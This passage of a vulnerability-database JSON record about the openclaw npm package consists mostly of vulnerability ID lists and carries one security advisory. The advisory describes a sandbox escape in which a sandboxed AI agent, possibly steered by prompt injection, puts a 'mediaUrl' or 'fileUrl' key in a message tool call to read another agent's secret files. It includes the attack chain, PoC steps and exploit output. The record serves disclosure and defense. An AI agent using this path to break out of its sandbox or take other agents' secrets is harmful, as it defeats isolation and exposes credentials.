-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35637","GHSA-vfg3-pqpq-93m4"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cyj6-zyuh-qug6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91841?format=json","vulnerability_id":"VCID-d3qp-5wm9-aqfp","summary":"OpenClaw has Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n\n**Description**:\n### Summary\nA path traversal vulnerability in the agent sandbox enforcement allows a sandboxed agent to read arbitrary files from other agents' workspaces by using the `mediaUrl` or `fileUrl` parameter key in message tool calls. The `normalizeSandboxMediaParams` function only checks `[\"media\", \"path\", \"filePath\"]` keys, while `mediaUrl` and `fileUrl` escape normalization entirely. Combined with `handlePluginAction` dropping `mediaLocalRoots` from the dispatch context, this enables a full sandbox escape where any agent can read files outside its designated sandbox root.\n\n### Details\nThe vulnerability exists in two files within the messaging pipeline:\n\n**1. Incomplete parameter key coverage in `normalizeSandboxMediaParams`:**\n\nIn `src/infra/outbound/message-action-params.ts`, the function iterates over a hardcoded allowlist of parameter keys to validate:\n\n```typescript\n// Line 212\nconst mediaKeys: Array<\"media\" | \"path\" | \"filePath\"> = [\"media\", \"path\", \"filePath\"];\n```\n\nThe `mediaUrl` and `fileUrl` parameter keys are not included in this array. These keys are actively used by multiple channel extensions (Discord, Telegram, Slack, Matrix, Twitch) for media attachment handling, but they completely bypass the sandbox path validation performed by `resolveSandboxedMediaSource`.\n\n**2. Dropped `mediaLocalRoots` in `handlePluginAction`:**\n\nIn `src/infra/outbound/message-action-runner.ts`, the `handlePluginAction` function dispatches actions to channel plugins but omits `mediaLocalRoots` from the context:\n\n```typescript\n// Lines 684-697\nconst handled = await dispatchChannelMessageAction({\n    channel,\n    action,\n    cfg,\n    params,\n    accountId: accountId ?? undefined,\n    requesterSenderId: input.requesterSenderId ?? undefined,\n    sessionKey: input.sessionKey,\n    sessionId: input.sessionId,\n    agentId,\n    gateway,\n    toolContext: input.toolContext,\n    dryRun,\n    // mediaLocalRoots is MISSING here\n});\n```\n\nDespite `ChannelMessageActionContext` defining `mediaLocalRoots?: readonly string[]` (in `src/channels/plugins/types.core.ts` line 478), plugins receive `undefined` and fall back to `getDefaultMediaLocalRoots()`, which permits reads of the entire `~/.openclaw/` directory tree — including all agents' workspaces.\n\n**Attack chain:**\n1. A sandboxed agent (Agent-A at `~/.openclaw/workspace/agent-a/`) calls the message tool with `{ mediaUrl: \"~/.openclaw/workspace/agent-b/secret.txt\" }`\n2. `normalizeSandboxMediaParams` skips the `mediaUrl` key (not in allowlist)\n3. `handlePluginAction` dispatches without `mediaLocalRoots`\n4. Plugin calls `loadWebMedia` with default roots, which allows `~/.openclaw/workspace/**`\n5. Agent-B's secret file content is read and sent as a channel attachment\n\n### PoC\n\n**Prerequisites:**\n- Docker installed\n- OpenClaw Docker image built (`openclaw-gateway:latest`)\n\n**Steps:**\n\n1. Start the vulnerable gateway container:\n\n```bash\ncd llm-enhance/cve-finding/Path_Traversal/CVE-2026-27522-Media_Root_Bypass-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n2. Run the exploit:\n\n```bash\npython3 poc_exploit.py\n```\n\n3. The exploit writes a secret file to `~/.openclaw/workspace/agent-b/secret_key.txt` inside the container, then invokes `normalizeSandboxMediaParams` with Agent-A's sandbox policy and `{ mediaUrl: <agent-b-secret-path> }`. The `mediaUrl` key bypasses normalization, and `loadWebMedia` reads the file successfully.\n\n4. Run the control experiment to confirm sandbox works for checked keys:\n\n```bash\npython3 control-sandbox_enforced.py\n```\n\n### Log of Evidence\n\n**Exploit output:**\n```\n=== CVE-2026-27522 Variant: Sandbox Media Root Bypass ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running exploit script with Bun...\n\n[VULNERABLE] mediaUrl bypassed normalizeSandboxMediaParams!\n  Agent-A sandboxRoot: /root/.openclaw/workspace/agent-a\n  mediaUrl targets Agent-B: /root/.openclaw/workspace/agent-b/secret_key.txt\n  args after normalization: {\"mediaUrl\":\"/root/.openclaw/workspace/agent-b/secret_key.txt\"}\n[EXPLOITED] Agent-B secret file content: AGENT-B-SECRET-API-KEY-sk-12345abcdef\n\n=== EXPLOIT SUCCESSFUL ===\nAgent-A read Agent-B's secret file via mediaUrl, bypassing sandbox.\n\n[+] RESULT: VULNERABLE — mediaUrl bypasses sandbox enforcement\n```\n\n**Control experiment output:**\n```\n=== Control Experiment: Sandbox Enforcement for 'media' Key ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running control script with Bun...\n\n[SAFE] normalizeSandboxMediaParams blocked 'media' key as expected!\n  Error: Path escapes sandbox root (/tmp/sandbox-ZKvGQX): /tmp/victim-2cuAOO/secret.txt\n\n=== CONTROL EXPERIMENT PASSED ===\nThe 'media' parameter IS correctly checked by sandbox enforcement.\nOnly unchecked keys (mediaUrl, fileUrl) bypass the sandbox.\n\n[+] CONTROL PASSED: 'media' key is correctly enforced by sandbox\n```\n\n### Impact\nThis is a **sandbox escape** vulnerability. An attacker who can influence an agent's tool calls (via prompt injection, multi-agent interaction, or malicious plugin instruction) can read arbitrary files from other agents' workspaces. This includes:\n- API keys and secrets stored in other agents' sandboxes\n- Session data and conversation logs\n- Configuration files with sensitive credentials\n- Any file within the `~/.openclaw/` directory tree\n\nThis completely defeats the purpose of the multi-agent sandbox isolation feature, which is documented as a security boundary in the project's Docker and sandboxing documentation.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14 (current latest)\n- **Patched versions**: <None>\n\n### Severity\n- **Severity**: High\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n\n### Weaknesses\n- **CWE**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227) | The `normalizeSandboxMediaParams` function with incomplete `mediaKeys` allowlist — `mediaUrl` and `fileUrl` are not checked. |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697) | The `handlePluginAction` dispatch call that omits `mediaLocalRoots` from the context passed to `dispatchChannelMessageAction`. |\n| [https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478](https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478) | The `ChannelMessageActionContext` type that defines `mediaLocalRoots` but never receives it from `handlePluginAction`. |","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35668","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17041","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17002","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17037","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35668"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35668","reference_id":"CVE-2026-35668","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35668"},{"reference_url":"https://github.com/advisories/GHSA-hr5v-j9h9-xjhg","reference_id":"GHSA-hr5v-j9h9-xjhg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hr5v-j9h9-xjhg"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters","reference_id":"openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf